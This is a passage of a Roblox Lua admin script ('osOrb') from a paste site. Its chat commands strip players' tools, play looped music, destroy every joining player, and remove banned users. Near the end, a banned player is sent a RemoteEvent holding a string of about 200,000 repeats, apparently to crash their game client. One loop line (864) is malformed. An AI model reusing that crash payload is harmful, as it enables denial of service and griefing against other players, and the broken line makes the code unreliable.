  789. for a, tool in pairs(player.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  790. end
  791. end)
  792. end
  793. end
  794. end
  795. end)
  796.  
  797. Admins.Chatted:connect(function(msg)
  798. if msg:lower() == Prefix .. "removetools me" then
  799. if Admins and Admins.Character and Admins:findFirstChild("Backpack") then
  800. for a, tool in pairs(Admins.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  801. for a, tool in pairs(Admins.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  802. end
  803. end
  804. end)
  805.  
  806. Admins.Chatted:connect(function(msg)
  807. if msg:lower() == Prefix .. "removetools all" then
  808. for i,v in pairs(game.Players:children()) do
  809. if v and v.Character and v:findFirstChild("Backpack") then
  810. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  811. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  812. end
  813. end
  814. end
  815. end)
  816.  
  817. Admins.Chatted:connect(function(msg)
  818. if msg:lower():sub(1,6) == "!music" then
  819. findsong = 'BadLukeeSoundsz'
  820. if workspace.Terrain:FindFirstChild(findsong) then
  821. game.Debris:AddItem(workspace.Terrain[findsong],0)
  822. end
  823. sd=Instance.new('Sound',workspace.Terrain)
  824. sd.SoundId = "http://www.roblox.com/asset/?id="..msg:sub(7,#msg)
  825. sd.Volume = 10
  826. sd.Name = 'BadLukeeSoundsz'
  827. sd.Pitch = 1
  828. sd.Looped = true
  829. sd:play()
  830.  
  831. if string.find(msg:lower():sub(7,#msg),'watcha') then
  832. sd.SoundId = "http://www.roblox.com/asset/?id=177681012"
  833. end
  834.  
  835. if string.find(msg:lower():sub(7,#msg),'lean') then
  836. sd.SoundId = "http://www.roblox.com/asset/?id=328474897"
  837. end
  838.  
  839. if string.find(msg:lower():sub(7,#msg),'baby') then
  840. sd.SoundId = "http://www.roblox.com/asset/?id=130841252"
  841. end
  842.  
  843. if string.find(msg:lower():sub(7,#msg),'moonman') then
  844. sd.SoundId = "http://www.roblox.com/asset/?id=340924386"
  845. end
  846.  
  847. if string.find(msg:lower():sub(7,#msg),'hello') then
  848. sd.SoundId = "http://www.roblox.com/asset/?id=313694441"
  849. end
  850.  
  851. if string.find(msg:lower():sub(7,#msg),'waves') then
  852. sd.SoundId = "http://www.roblox.com/asset/?id=253545802"
  853. end
  854.  
  855. if string.find(msg:lower():sub(7,#msg),'cake') then
  856. sd.SoundId = "http://www.roblox.com/asset/?id=313144336"
  857. end
  858. end
  859. end)
  860.  
  861. Admins.Chatted:connect(function(msg)
  862. if msg:lower() == Prefix .. "pri" then
  863. game.Players.PlayerAdded:connect(function(player)
  864. repeat until player.Character wait()
  865. player:Destroy()
  866. end)
  867. end
  868. end)
  869.  
  870. p = Instance.new("Part", game.Workspace)
  871. Game:GetService('Chat'):Chat(p, "Welcome to osOrb " .. Admins.Name .. "! Orb made by BadLuke1. The current prefix is " .. Prefix .. "! Say " .. Prefix .. "cmds to show a list of commands!", Enum.ChatColor.Blue)
  872. p.Parent = Admins.Character.Torso
  873. p.BrickColor = BrickColor.new("Really red")
  874. p.Size = Vector3.new(1,1,1)
  875. p.Shape = "Ball"
  876. p.Material = Enum.Material.Neon
  877. p.Anchored = true
  878. p.Locked = true
  879. p.CanCollide = false
  880. for i = 1,math.huge,Speed do wait()
  881. if workspace:FindFirstChild(Admins.Name) then
  882. p.CFrame = CFrame.new(Admins.Character.Torso.Position) * CFrame.fromEulerAnglesXYZ(math.sin(i),math.abs(i),math.sin(i)) * CFrame.new(0,0,-6)
  883. p2 = Instance.new("Part", p)
  884. p2.CFrame = p.CFrame * CFrame.new(0,0,0)
  885. p2.FormFactor = Enum.FormFactor.Custom
  886. p2.Size = Vector3.new(0.3,0.3,0.3)
  887. p2.BrickColor = BrickColor.new("Really black")
  888. p2.Transparency = 0.3
  889. p2.CanCollide = false
  890. p2.Anchored = true
  891. p2.Material = Enum.Material.Neon
  892. game.Debris:AddItem(p2,1)
  893. end
  894. end
  895.  
  896. game:GetService('RunService').Stepped:connect(function()
  897. for i,v in pairs(Players:children()) do
  898. if v.Name==Banned and v.Name~="BadLuke1" then
  899. v:remove()
  900. end
  901. end
  902. end)
  903.  
  904. Players.PlayerAdded:connect(function(player) do
  905. if player.Name==Banned then
  906. banplr=Instance.new('RemoteEvent',workspace):FireClient(player,{string.rep("Gettingbanformationbro?",2e5+5)})
  907. game.Debris:AddItem(banplr,1)
  908. end
  909. end
  910. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement